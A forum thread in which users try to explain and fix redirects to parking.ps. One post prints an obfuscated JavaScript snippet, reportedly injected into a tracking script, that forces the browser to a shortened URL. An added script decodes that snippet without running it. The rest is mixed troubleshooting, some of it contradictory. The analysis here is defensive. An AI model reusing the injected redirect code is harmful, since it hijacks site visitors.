
Anyone know about parking.ps/ virus?


davejonesbkk


Could also run a superb utility which finds BHOs called HIJACKTHIS. You do need a level of tech understanding as its output isn't that easy to read.

To make the output of HijackThis a little easier to understand, paste the output log into http://www.hijackthis.de/index.php?langselect=english ; they will analyse it against their database and return results that will give a better understanding.


Seeing as though this was affecting my iOS devices (iPad and iPhone) but not my laptop, I've reverted back to using the app on both iOS devices.

This parking redirect BS is getting worse. Prior to today the simple work - but still tremendously annoying - around was to click the URL bar, which seemed to stop the redirect and left you on the TVF page you were viewing. Now, doing this stops the redirect on the parking redirect and you then have to hit back to get back to the TVF page.

#firstworldproblemsandallthatjazz


that 'always https' plugin for Chrome seems to be doing the job ok for me so far.

For those of you scanning your computer etc. with malware programs and looking at the processes, you won't find anything, as it looks like this is happening in the connection and external to computers.


At first I thought parking.ps was affecting only PCs and iMacs but now I read that hand-held devices running on Android and iOS also get infected.

For such hand-held devices, would the easiest solution be to do a so-called factory reset?


@davejonesbkk for it to be a 'connection problem' would IMO mean it was DNS related, something that is certainly possible but difficult to achieve.

@maestro been reading about the massive increase in mobile OS attacks and the shift of focus of hackers to them due to the general ignorance of security people have towards them. Samsung are releasing KNOX to try and combat this trend and it's just another reason not to root a device....


I'm also experiencing this ***ing parking.ps redirecting problem. In fact, while typing this post it has happened 4 or 5 times. Thai Visa what is going on? It has been happening on other websites too since Thursday but on Thaivisa.com it happens every minute!! It only happens on my iPhone and iPad.

Delete history and cookies. It worked for me.


Hi Guys,

This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop.

What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure.

The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere).

We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server.

Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache.

The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur.

Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, it's your internet session that's getting hijacked.

  • Like 2
Rubbish.

My Galaxy Note was redirecting in Pattaya, Tokyo and Miami. My iPad was doing it in all the same locations. My desktop only in Pattaya.

You're getting cache hits.


The owner of the parking.ps domain explains here what may have happened...

https://discussions.apple.com/message/22912367#22912367

So he is getting free hits but he doesn't like the way his domain is searched on Google. If he was sincere, at least he could disable redirects for people from India and Thailand.

I'd say somebody is after quick money and True is too slow to fix things.


I think this comes from True's proxy server and is easily removed by Malwarebytes. I've never heard of cleanpcguide.com before and would stay well clear of them, might easily make matters much worse.

I don't think it has anything to do with True as Narita airport ISP does the same thing...

I will clear my cache on all devices and see what happens.


I find that this add-on for Firefox works. It gives a small warning by the task bar when it blocks a page.

https://addons.mozilla.org/en-us/firefox/addon/blocksite/

It slows the browser down a bit but I can at least read a newspaper page without being re-directed half a dozen times.

Can't find anything for IE that blocks without putting up another page that says it blocked a page.


There's a javascript file being loaded that is being modified by a 3rd party somehow.

The file name is quant.js. It's loading from: http://edge.quantserve.com/quant.js

The offending code looks like:

//<![CDATA[
if(!fxpr) { var fxpr = 1; function __x(zz) { var _0xede9=["\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72]; setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*76543)+zz)); } function vl1() { top.location = 'http://goo.gl/QBwtIl'; } __x(1234); }
//]]>
The hex part is redirecting to http://goo.gl/4QR3H2 which is parking.ps.
If you try to open edge.quantserve.com/quant.js and get this code, hit Ctrl+R; it will reload and download an original file. Clearing cache should also help.
Since it is not happening on all sites, I think it's coming from some broken ad server, or quantserve.com DNS got poisoned somehow and changed to some malicious IP which had the modified version of quant.js. So it was redirecting when you visit sites that used quant.js from this server.
  • Like 1
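A static way to read the snippet quoted in the post above without running it, as an added example that is not part of the original thread: it decodes the `\xNN` escapes and lists the navigation targets. The function names are illustrative; the sample is the code from the post, wrapped across lines and treated purely as text.

```javascript
// Added example: static triage of an injected script. The sample is never
// executed, only scanned as text.

// Snippet from the post above, wrapped across lines. The third literal is
// missing its closing quote in the post and is kept that way here.
const SAMPLE = String.raw`if(!fxpr) { var fxpr = 1; function __x(zz) { var _0xede9=[
"\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B",
"\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72];
setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*76543)+zz)); }
function vl1() { top.location = 'http://goo.gl/QBwtIl'; } __x(1234); }`;

// Turn every \xNN escape into the character it stands for.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Decode string literals made only of \xNN escapes. The closing quote is
// not required, so a truncated literal is still recovered.
function decodedLiterals(source) {
  const out = [];
  for (const m of source.matchAll(/"((?:\\x[0-9A-Fa-f]{2})+)/g)) {
    out.push(decodeHexEscapes(m[1]));
  }
  return out;
}

// Collect distinct http(s) URLs in order of appearance.
function extractUrls(text) {
  const urls = new Set();
  for (const m of text.matchAll(/https?:\/\/[^\s'"<>;)]+/g)) urls.add(m[0]);
  return [...urls];
}

function triage(source) {
  const plainUrls = extractUrls(source);
  const decoded = decodeHexEscapes(source);
  return {
    literals: decodedLiterals(source),
    plainUrls,
    // URLs that only show up after decoding are the ones being hidden.
    hiddenUrls: extractUrls(decoded).filter((u) => !plainUrls.includes(u)),
    // True when the decoded text writes to top/window location.
    navigates: /\b(?:top|window)\b[\w.]*\blocation\b/.test(decoded),
  };
}

console.log(triage(SAMPLE));
```

The decoded literals show that `_0xede9[1]` and `_0xede9[2]` are just `random` and `floor`, and that the first literal is a code string handed to `setTimeout` after a random delay.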

Thank you, Para. The information in the link you posted looks like the best advice so far in this topic about how to remove the parking.ps redirect. Fortunately, my laptop is not infected but I checked the msconfig just the same to make sure. In Windows 7 it is as follows:

  • Click on Start
  • In the search field, type msconfig, then press Enter
  • Click on Startup in the headings row
  • Click on header Startup Item to sort the list alphabetically
  • Scroll down the list to see if there is Parking.ps in the column Startup Item

Luckily, I haven't got it, nothing starting with P.


There is no parking.ps malware. The malware is actually the fake tools being offered to "remove" it. They will infect your machine with all sorts of junk. The redirect is being caused by a JS file that is loading from the ISP. This file does not install any malware.

If you're seeing the redirect do not install any tool that offers to remove parking.ps malware.


  • 4 weeks later...

Woke up this morning to these forex redirects. Going through this and another similar thread, I see a lot of contradictory fixes. Has anybody come up with a definitive fix yet? I have Adblock, HTTPS Everywhere etc. installed and have cleared my cache as suggested. I haven't done certain things because others have said they are either ineffective or could be damaging.

Thanks!


My problem started with compare.com hijacking BBC Sport. I installed Adblocker and that stopped that page. Then another site started taking over BBC. I cleared caches and installed HTTPS Everywhere. I have no idea what HTTPS Everywhere is doing but the counter it has has gone up to 4 in 10 mins. My problem is happening on 2 laptops that I use in 2 different locations, with different providers. Very annoying.


Here's what I posted over in the forex thread.

I added these custom filters to Adblock Plus. Other ad blocking extensions might use a different syntax.

||chartbeat.com^
||quantserve.com^
||scorecardresearch.com^

Those seemed to do the trick for me.

It's possible that Ghostery, a privacy oriented extension, might also work since it blocks some of these same scripts by default. I haven't tried this.

As for HTTPS Everywhere, it simply attempts to make your browser connect to sites via https (encrypted) instead of http (unencrypted). I'm not sure that'll help with this particular problem, but it's worthwhile to have anyway.

Lastly, to reiterate some of what's been said before, these recent redirects are most likely the result of bad third-party scripts on some of the sites you visit. This is why something as simple as an ad blocker can work; you can tell it to stop those scripts from loading. I hope this has helped.


Well, it stopped as quickly as it started. I haven't had it happen in 24 hours and can't really say it's because of anything I did. I did add the filters to Adblock as suggested just in case.

Thanks
